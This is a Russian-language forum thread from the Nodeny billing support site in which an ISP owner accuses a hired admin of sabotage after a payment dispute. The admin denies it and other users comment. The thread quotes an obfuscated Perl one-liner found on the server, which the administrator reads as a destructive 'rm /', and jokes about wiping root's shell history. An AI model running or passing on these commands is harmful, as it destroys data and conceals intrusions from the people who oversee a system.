Биллинговая система Nodeny
15 Мая 2024, 21:55:41 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
Новости: Прекращена поддержка версии Nodeny 49
 
   Начало   Помощь Поиск Войти Регистрация  
Страниц: [1]
  Печать  
Автор Тема: Остерегайтесь товарища по кличке nops!!!  (Прочитано 5214 раз)
ruslanlee
Новичок
*

Карма: -1
Offline Offline

Сообщений: 2


Просмотр профиля
« : 12 Мая 2010, 00:03:10 »

Как то я решил поменять биллинг  , с трифика инспектара на Nodeny , ну в линуксе я ничего не понимаю максимум могу систему поставить ,и решил что мне нужен человек который мне это дело всё поставит , нашелся такой отваришь как nops , договорились мы с ним об установке , всё поставили всё отлично , всё работает , деньги получили все рады .

Тут мы договорились а администрировании системы и коммутаторов в моей сети , сеть небольшая примерно 12 домов .

Я уму выдал задание где-то в середине месяца
1.Это сделать привязку mac/ip
2. Отказоустойчивость  наладить .

И тут приходит день оплаты, за месяц якобы работы ,
и мне говорит:
nps---- а что на счёт денег
Я------- как сделаешь коммутаторы сразу заплачу
nops ----- какие коммутаторы , нечего не знаю , иди в упопу ,
Я-----ну мы же договаривались
nops----- ничего не знаю , не договаривались

ну и так мы где то два дня выясняли отношения !

Ну и я ему сказал не хочешь не делай , я найду другого админа , тебе заплачу и дасвидос !

И я решил сменить Админа , нахрен мне такой !

И тут этот отваришь пропёр что в его услугах больше не нуждаются ,что я не пошутил ,и  начал гадить !

1.Написал на этом форуме что типа оберегайтесь питерского заказчика типа он кидает , остерегайтесь итд, ну он её удалил сразу после того как я ему сказал что не заплачу нехрена  .

потом

2.Сменил всё пароли на базе данных (мне пришлось лесть к серверу , хотя он знает как я не люблю лазят к серверам )

3.нашли вот такую вещь
/usr/bin/perl -e '$??s:;s:s;;$?::s;;=>%-{<-|}<&|`{;;y; -/[-`{-};`-{/" -;;s;;$_;see'

И ещё не знаю что он там припас на последок !

вот такая вот пятрушка !!!! Непонимающий Непонимающий Непонимающий

Записан
nops
NoDeny
Постоялец
*

Карма: 3
Offline Offline

Сообщений: 177


А ведь так и есть!!!!

316352175
Просмотр профиля WWW Email
« Ответ #1 : 12 Мая 2010, 07:26:09 »

Друг любезный, твой сервак хакнули, это уже не моя проблема.
Ты нашёл другого одмина, ради бога, это твоё дело, но ты своё обещание так и не выполнил. Так что, на счёт "Остерегайтесь товарища...." это ты зря. Тебя я предупреждал, что твои сервера будут хакать, в любом случае, а так же говорил, что такой простой пароль как у тебя подобрать очень легко. Писать конечно я его не буду сюда, но поверь, он уж ОООчень прост.
Ты только появился на форуме и начинаешь наезжать на меня. Ну что же, твоё право. Свобода слова в России. Только заметь, Когда ты сказал, что ты всё таки оплатишь, я удалил своё сообщение компрометирующее тебя.
второй момент,
Цитировать
тебе заплачу и дасвидос !
дата оплаты была 5 мая, сегодня 12 мая. Денег я так и не увидел и похоже, ты бросил слова на ветер и свои обещания не выполнил.
Заметь, проблем с биллингом у меня не было, проблемы были у тебя, в частности с УПСами, эл.энергией, магистральным каналом.....
И имей ввиду, тот админ, которого ты нашёл, потом поймёт, если уже не понял, что ты просто можешь кинуть. Прошла неделя, денег нет. Мои реквизиты у тебя есть. Какие проблемы-то?
Цитировать
И ещё не знаю что он там припас на последок !
Я тебе уже говорил, я не злапамятный человек, жизнь рассудит, поставит всё на свои места. И поверь, она тебя накажет за всё, рано или поздно. Не буду вдаваться в философию, но всё возвращается на круги своя.
Ещё раз повторюсь! Если тебя хакнули и сменили пароли, то это проблема не моя, если так совпало, то это тоже не моя проблема. У меня нет проблем с другими клиентами, т.к. люди знают что я делаю, и сколько это стоит. Работает далеко не один сервак и не только биллинг NoDeny. Пока никто не жалуется.
Если я на кого-то на форуме наезжал, в частности на Cell, тому была причина, но все конфликты уже решены, а ты так и не хочешь заплатить за работу, которую ты якобы не видел.....
P.S. Да, кстати, работу админа ты так и не увидишь....... даже при большом желании. что он там на серваке делает ты даже и не догадываешься. А того, кого ты нашёл? Ты в нём уверен?
 
Ну вообщем флаг тебе в руки. Счастья в жизни.
 
P.P.S. да, вот ещё что. Создавать тему и хаять тебя я не буду, не хочу превращать форум поддержки в говнофорум, каких море.
« Последнее редактирование: 12 Мая 2010, 07:32:25 от nops » Записан

Не надо говорить СПАСИБО! Для этого есть специально "Прибавить" к карме!!
blackjack
NoDeny
Старожил
*

Карма: 24
Offline Offline

Сообщений: 352


Просмотр профиля Email
« Ответ #2 : 12 Мая 2010, 09:06:00 »

выясняйте свои отношения в личке или где угодно, администрация примите меры
Записан
elite
Начальник планеты
NoDeny
Спец
*

Карма: 52
Offline Offline

Сообщений: 1227

In LAN we trust!

358714596
Просмотр профиля
« Ответ #3 : 12 Мая 2010, 09:08:15 »

выясняйте свои отношения в личке или где угодно, администрация примите меры
ну тут дело такое, если тов. nops действительно поступил так, как описывает тов. ruslanlee, то это очень-очень нехорошо, и надо бы чтобы народ знал об этом
Записан
elite
Начальник планеты
NoDeny
Спец
*

Карма: 52
Offline Offline

Сообщений: 1227

In LAN we trust!

358714596
Просмотр профиля
« Ответ #4 : 12 Мая 2010, 09:12:14 »

Друг любезный, твой сервак хакнули, это уже не моя проблема.
............
Тебя я предупреждал, что твои сервера будут хакать, в любом случае
........
Ещё раз повторюсь! Если тебя хакнули и сменили пароли, то это проблема не моя, если так совпало, то это тоже не моя проблема.
от че-то не верю Улыбающийся у меня на тестовых серваках иногда по несколько месяцов стоит пароль типа 1234, и никто не хакает Улыбающийся
это первый момент, а второй - зачем хакеру заниматься таким маразмом, как /usr/bin/perl -e '$??s:;s:s;;$?::s;;=>%-{<-|}<&|`{;;y; -/[-`{-};`-{/" -;;s;;$_;see'  Непонимающий Улыбающийся))) непонятно...
Записан
ser970
NoDeny
Спец
*

Карма: 70
Offline Offline

Сообщений: 1323

262462619
Просмотр профиля Email
« Ответ #5 : 12 Мая 2010, 09:16:27 »

Тебя я предупреждал, что твои сервера будут хакать, в любом случае, а так же говорил, что такой простой пароль как у тебя подобрать очень легко. Писать конечно я его не буду сюда, но поверь, он уж ОООчень прост.
ну если ты админ то ты и задаешь пароли.

P.S. Да, кстати, работу админа ты так и не увидишь....... даже при большом желании. что он там на серваке делает ты даже и не догадываешься.
читаем маны особенно по ссн .  можно писать в лог то что делаетсч по ссн.  

а вооще без доказательств это просто бред .
приведи логи ссн приведи даты измений файлов.иначе это не тема для обсуждения.
З.Ы. почитай ук . без доказательств можно т попасть.


Записан
stix
NoDeny
Спец
*

Карма: 72
Offline Offline

Сообщений: 1872


Nodeny Support Team

205539
Просмотр профиля
« Ответ #6 : 12 Мая 2010, 09:29:17 »

cat /dev/null > /root/.bash_history  Показает язык
Записан
Cell
NoDeny
Спец
*

Карма: 52
Offline Offline

Сообщений: 1407



Просмотр профиля
« Ответ #7 : 12 Мая 2010, 09:56:15 »

cat /dev/null > /root/.bash_history  Показает язык
cat /dev/null > /
)))
Записан
goletsa
NoDeny
Спец
*

Карма: 21
Offline Offline

Сообщений: 973


Просмотр профиля
« Ответ #8 : 12 Мая 2010, 10:16:24 »

Код:
# last | less
#cat /var/log/auth.log
Записан
ruslanlee
Новичок
*

Карма: -1
Offline Offline

Сообщений: 2


Просмотр профиля
« Ответ #9 : 12 Мая 2010, 12:23:03 »

Товаришь nops , то что ты не сделал работу о которой мы договаривались , это одно ,
и после этого я все равно сказал тебе что я тебе заплачу , хотя мог просто сказать работа не сделана , денег не будет , но нет же я сказал что заплачу всё в полном размере .

А ты же что сделал , нажрался , написал про меня то что и не было , и после того как я тебе пригрозил что не заплачу ты этот пост удали !!

Да и пароли ты мог бы и сменить на любой другой , акцентировать это тем что могут хакнуть , но ты этого не предложил , значит пароль был вприцепе нормальный !

И почему же всё таки хакнули базу а не шлюз и базу , а только базу , потому что на обоих сервера было установлено программа управления не помню как она называется,  и на шлюзе её удалили а вот на базе пропустили ,  и почему то хакнули как ты говоришь , после того как мы с тобой не договорились, а не до этого !

Что за философию ты там развёл , я и сейчас не против тебе заплатить и ты это знаешь !!
Сделай то что я тебе сказал а именно

 только после того как ты на томже форуме напишешь что ты был пьяный и написал про меня всякую хрень !и приносишь свои извеннения тогда отправлю , как только я увижу что ты написал , я сразу перечислю деньги !

Можешь тут же написать , не создавая нового поста !

И то я ещё подумаю !! а то вон сколько нагадил и тебе ещё за это деньги платить !




« Последнее редактирование: 12 Мая 2010, 15:11:06 от versus » Записан
stix
NoDeny
Спец
*

Карма: 72
Offline Offline

Сообщений: 1872


Nodeny Support Team

205539
Просмотр профиля
« Ответ #10 : 12 Мая 2010, 13:09:12 »

купите на эти денюжки мне модули  Строит глазки
Записан
nops
NoDeny
Постоялец
*

Карма: 3
Offline Offline

Сообщений: 177


А ведь так и есть!!!!

316352175
Просмотр профиля WWW Email
« Ответ #11 : 12 Мая 2010, 15:07:45 »

Так, Руслан. Сейчас ты эту демогогию развёл а не я.
Уверяю тебя, что я реально не имел доступа к твоим серверам. Видел что ты сменил пароли на шлюзе. Проверил на базе, аналогично. То, о чём ты говоришь, я и не пользуюсь......, если честно, то даже забыл про неё)))
А про то, что я нажрался, давай немного уточним
да, соглашусь что я был не трезв но ОООчень далеко не нажрался. Да, я опубликовывал пост, с предупреждением что так и так, но, после разговора с тобой, где ты меня убедил, что деньги перешлёшь, я сразу удалил свой пост. Заного создавать тему, компрометирующую тебя я, как и писал в скайпе, не буду... И сейчас, создавать тему о том, что ты такой сякой пока не буду. Если ты выполнишь своё обещание, то тут же отпишусь, что "ты слов на ветер не бросаешь". Ранее этого я писать ничего не буду. Так же и в этой ветке форума я не буду писать что ты такой сякой и следом опровержение.
 
Действительно, я был не трезв, когда писал свой пост про Руслана, но я не был бухой и мне просто надоело уже ждать.
Сейчас я ещё подожду, тебе решать.
Да, и не забудь тему переименовать.....
Записан

Не надо говорить СПАСИБО! Для этого есть специально "Прибавить" к карме!!
versus
Администратор
Спец
*****

Карма: 21
Offline Offline

Сообщений: 845


44306843
Просмотр профиля WWW Email
« Ответ #12 : 12 Мая 2010, 15:17:55 »

ничего не понял, один чел не заплатил другому и говорит нашел rm /
теперь разборки идут. кто чего кому договаривался и что  кому что делал.
причем тут нодени не понятно, я так понимаю что человек перестраховывался от возможной неуплаты денег заказчиком. Другой причины почему он написал rm /  я не вижу.
Может все таки в личке выяснять отношения Непонимающий 
Записан
nops
NoDeny
Постоялец
*

Карма: 3
Offline Offline

Сообщений: 177


А ведь так и есть!!!!

316352175
Просмотр профиля WWW Email
« Ответ #13 : 12 Мая 2010, 15:36:20 »

я вообще не понял сути его поста. Человек захотел запостить, он запостил. Ему нужно было опровержение что он не "такой сякой", а хороший.
Я, после его обещаний, написал выше, что он обещал и я снимаю свои обвинения в его адрес по поводу его неоплаты и жду выполнения обещаний.
Вообще полностью с тобой согласен. К биллингу, к самому биллингу, эти разборки не имеют никакого отношения. Почему он написал сюда, моё мнение: Потому что у него стоит биллинг NoDeny.
Записан

Не надо говорить СПАСИБО! Для этого есть специально "Прибавить" к карме!!
Страниц: [1]
  Печать  
 
Перейти в:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.20 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!